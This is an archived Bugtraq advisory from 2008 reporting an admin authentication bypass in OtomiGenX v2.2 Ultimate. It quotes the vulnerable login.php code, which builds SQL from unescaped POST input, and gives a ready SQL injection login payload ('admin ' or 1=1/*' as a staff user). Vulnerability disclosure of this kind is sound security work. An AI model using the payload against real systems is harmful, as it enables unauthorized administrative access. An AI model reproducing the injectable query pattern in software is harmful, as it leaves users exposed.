Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability
From: hadihadi_zedehal_2006 () yahoo com
Date: 1 Jun 2008 00:29:08 -0000

 
 ######################################################################################
 #                                                                                    #
 #  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #           
 ######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) 
----------------
                                .::::admin Authentication bypass vuln::::.
//vuln code in login.php:
...
..
...
line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password

if($_POST[userType] != 'Staff')
{$sql     = "SELECT userID, userName 
             FROM user_account 
             WHERE userAccount='$_POST[userAccount]' AND 
                     userPassword='$passwd' AND 
                     userType='$_POST[userType]' AND isApproved='1'";

}else
$sql      = "SELECT staffID, staffName, staffGroupID 
             FROM staff 
             WHERE staffAccount='$_POST[userAccount]' AND 
                     staffPassword='$passwd'";
...


-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------




  By Date           By Thread  

Current thread:
  • OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability hadihadi_zedehal_2006 (Jun 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]